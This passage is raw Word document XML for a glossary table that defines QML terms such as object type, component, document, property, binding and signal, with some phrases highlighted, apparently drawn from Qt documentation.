              <w:t xml:space="preserve"> from a basic type; for example, it is not possible to create an</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="HTML2"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>int</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>object with properties, methods, signals and so on.</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 xml:space="preserve">Basic types </w:t>
            </w:r>
            <w:r w:rsidRPr="00806176">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>are built into</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the QML language, whereas object types cannot be used unless the appropriate</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId426" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>module</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is imported.</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See</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId427" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>The QML Type System</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for more details.</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Object Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8164"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A</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId428" w:anchor="qml-object-types" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QML Object Type</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is a type that </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>can be instantiated</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> by the QML engine.</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 xml:space="preserve">A QML type can be defined either by a </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>document</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> in a .qml file beginning with a capital letter, or by a</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId429" w:history="1">
              <w:r w:rsidRPr="00112022">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QObject</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-based C++ class.</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See</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId430" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>The QML Type System</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for more details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00112022" w:rsidRPr="00953F02" w:rsidTr="00D919D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1841"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953F02" w:rsidRDefault="00112022" w:rsidP="00D919D6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8164"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 xml:space="preserve">A QML object is an </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>instance</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> of a</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId431" w:anchor="qml-object-types" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QML Object Type</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</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 xml:space="preserve">Such objects are </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>created by the engine</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> when it processes</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId432" w:anchor="object-declarations" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>object declarations</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>, which specify the objects to be created and the attributes that are to be defined for each object.</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 xml:space="preserve">Additionally, objects can be dynamically created at runtime through </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Component.createObject</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">() and </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Qt.createQmlObject</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>().</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00112022" w:rsidRPr="00953F02" w:rsidRDefault="00112022" w:rsidP="00D919D6">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>See also</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId433" w:anchor="lazy-instantiation" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Lazy Instantiation</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>.</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8164"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 xml:space="preserve">A component </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is a template from which a QML object or object tree is created. It is produced when a document is loaded by the QML engine. Once it has been loaded, it can be used to instantiate the object or object tree that</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> it represents.</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Additionally, the</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId434" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Component</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">type is </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>a special type that can can be used to declare a component inline within a document</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. Component objects can also be dynamically created through </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Qt.createComponent()</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to dynamically create QML objects.</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953F02" w:rsidRDefault="00112022" w:rsidP="00D919D6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8164"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A</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId435" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QML Document</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">is a </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>self contained piece of QML source</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> code that </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>begins</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> with one or more import statements and </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>contains</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> a single top-level object declaration. A document may </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>reside</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> in a .qml file or a text string.</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 xml:space="preserve">If it is placed in a .qml file whose name begins with a capital letter, the </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>file is recognized by</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the engine as a definition of a QML type. The top-level object declaration encapsulates the object tree that will be instantiated by the type.</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Property</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8164"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 xml:space="preserve">A property is an </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>attribute of an object</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> type that has a name and an associated value; this value can be read (and in most cases, also written to) </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>externally</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</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 xml:space="preserve">An object can have one or more properties. Some properties are associated with the </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>canvas</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> (e.g., x, y, width, height, and opacity) while others may be </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>data specific</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to that type (e.g., the "text" property of the</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId436" w:anchor="text" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Text</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>type).</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See</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId437" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QML Object Attributes</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for more details.</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953F02" w:rsidRDefault="00112022" w:rsidP="00D919D6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Binding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8164"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 xml:space="preserve">A binding is a </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>JavaScript expression which is "bound" to a property</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. The value of the property at any point in time will be the value returned by </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>evaluating</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> that expression.</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See</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId438" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Property Binding</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>for more details.</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>Signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8164"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 xml:space="preserve">A signal is a </w:t>
            </w:r>
            <w:r w:rsidRPr="00112022">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>notification from a QML object</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. When an object emits a signal, other objects can receive and process this signal through a</w:t>
            </w:r>
            <w:r w:rsidRPr="00953F02">
              <w:rPr>
                <w:rStyle w:val="apple-converted-space"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:hyperlink r:id="rId439" w:anchor="signal-attributes" w:history="1">
              <w:r w:rsidRPr="00953F02">
                <w:rPr>
